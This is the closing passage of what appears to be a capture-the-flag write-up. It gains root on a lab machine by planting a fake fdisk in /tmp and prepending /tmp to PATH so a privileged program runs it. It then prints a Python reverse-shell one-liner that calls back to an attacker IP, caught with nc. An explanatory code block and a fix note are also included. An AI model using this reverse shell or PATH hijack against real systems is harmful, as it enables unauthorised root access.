I/O size (minimum/optimal): 512 bytes / 512 bytes






Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x44c94251

Device     Boot Start      End  Sectors Size Id Type
/dev/sda1  *     2048 41940991 41938944  20G 83 Linux


Disk /dev/loop8: 91.4 MiB, 95805440 bytes, 187120 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop9: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop10: 54.5 MiB, 57151488 bytes, 111624 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop11: 149.9 MiB, 157192192 bytes, 307016 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

====================CPU Info====================
processor       : 0
vendor_id       : AuthenticAMD
cpu family      : 23
model           : 1
model name      : AMD EPYC 7401P 24-Core Processor
stepping        : 2
microcode       : 0x8001230
cpu MHz         : 2000.000
cache size      : 512 KB
physical id     : 0
siblings        : 1
core id         : 0
cpu cores       : 1
apicid          : 0
initial apicid  : 0
fpu             : yes
fpu_exception   : yes
cpuid level     : 13
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs            : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips        : 4000.00
TLB size        : 2560 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 43 bits physical, 48 bits virtual
power management:

processor       : 1
vendor_id       : AuthenticAMD
cpu family      : 23
model           : 1
model name      : AMD EPYC 7401P 24-Core Processor
stepping        : 2
microcode       : 0x8001230
cpu MHz         : 2000.000
cache size      : 512 KB
physical id     : 2
siblings        : 1
core id         : 0
cpu cores       : 1
apicid          : 2
initial apicid  : 2
fpu             : yes
fpu_exception   : yes
cpuid level     : 13
wp              : yes
flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl tsc_reliable nonstop_tsc cpuid extd_apicid pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ssbd ibpb vmmcall fsgsbase bmi1 avx2 smep bmi2 rdseed adx smap clflushopt sha_ni xsaveopt xsavec xsaves clzero arat overflow_recov succor
bugs            : fxsave_leak sysret_ss_attrs null_seg spectre_v1 spectre_v2 spec_store_bypass
bogomips        : 4000.00
TLB size        : 2560 4K pages
clflush size    : 64
cache_alignment : 64
address sizes   : 43 bits physical, 48 bits virtual
power management:


====================MEM Usage=====================
              total        used        free      shared  buff/cache   available
Mem:           3.8G        595M        1.6G         12M        1.6G        3.0G
Swap:          947M          0B        947M

You can see that the Disk Info section is identical to the output of fdisk -l.

We abuse PATH to replace the fdisk that gets executed.

theseus@ubuntu:/tmp$ touch fdisk
touch fdisk
theseus@ubuntu:/tmp$ echo /bin/bash > fdisk
echo /bin/bash > fdisk
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@ubuntu:/tmp$

Now /tmp/fdisk should be run in place of the real fdisk.
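To show why the PATH trick above works and what a SUID program should do instead, here is an added example (not the machine's info.c): it mirrors the bare-command lookup that a call like system("fdisk -l") goes through and audits the searched directories for ones other users can write to; the scratch tree it builds stands in for /sbin and /tmp.

```python
import os
import stat
import tempfile

# Added illustration for this write-up; the machine's own info.c is not shown
# here, only the lookup a bare "fdisk -l" goes through when run via system().


def resolve(command, path):
    """Return the first executable named `command` in the PATH-style string
    `path` (searched left to right), or None. This is the lookup a bare command
    name gets from /bin/sh when a program calls system("fdisk -l")."""
    for directory in path.split(os.pathsep):
        candidate = os.path.join(directory, command)
        if directory and os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijack_risks(command, path):
    """Return (winner, risky_dirs): the executable the lookup picks, plus every
    directory searched up to and including the winner's that other users can
    write to. A SUID program trusting such a PATH can be made to run a planted
    file; the sticky bit on /tmp does not help, since creating files is allowed."""
    winner = resolve(command, path)
    risky = []
    for directory in path.split(os.pathsep):
        if not directory or not os.path.isdir(directory):
            continue
        if os.stat(directory).st_mode & stat.S_IWOTH:
            risky.append(directory)
        if winner is not None and os.path.dirname(winner) == directory:
            break
    return winner, risky


def demo():
    """Rebuild the write-up's situation in a scratch tree (constructed, not the
    real box): a system fdisk, a planted /tmp-style fdisk, and the two PATHs."""
    with tempfile.TemporaryDirectory() as root:
        sysdir = os.path.join(root, "sbin")
        tmpdir = os.path.join(root, "tmp")
        os.mkdir(sysdir)
        os.mkdir(tmpdir)
        os.chmod(sysdir, 0o755)
        os.chmod(tmpdir, 0o1777)  # world-writable + sticky, like /tmp
        for directory in (sysdir, tmpdir):
            stub = os.path.join(directory, "fdisk")
            with open(stub, "w") as fh:
                fh.write("#!/bin/sh\necho stub fdisk in " + directory + "\n")
            os.chmod(stub, 0o755)
        attacker_path = tmpdir + os.pathsep + sysdir  # export PATH=/tmp:$PATH
        fixed_path = sysdir                           # system dirs the program sets itself
        return {
            "tmpdir": tmpdir,
            "sysdir": sysdir,
            "attacker": hijack_risks("fdisk", attacker_path),
            "fixed": hijack_risks("fdisk", fixed_path),
        }


if __name__ == "__main__":
    result = demo()
    print("PATH=/tmp:$PATH picks", result["attacker"][0], "risky:", result["attacker"][1])
    print("fixed PATH picks     ", result["fixed"][0], "risky:", result["fixed"][1])
```

The corresponding fix in a privileged program is to invoke /sbin/fdisk by absolute path (or set PATH itself before calling system()) rather than inheriting the caller's environment.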

root@ubuntu:/tmp# ls
ls
root@ubuntu:/tmp# cd ../root
cd ../root

For some reason I ended up with a shell that returned no output, so I reused the python from the image,

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

and caught it with nc in another shell.

Then:

kali@kali:~$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40152
root@ubuntu:/root# ls
ls
info.c
root.txt

This gets root.

Closing

This was an incredibly fun machine! I got really stuck on the EXIF part and kept searching the forum for hints, lol.
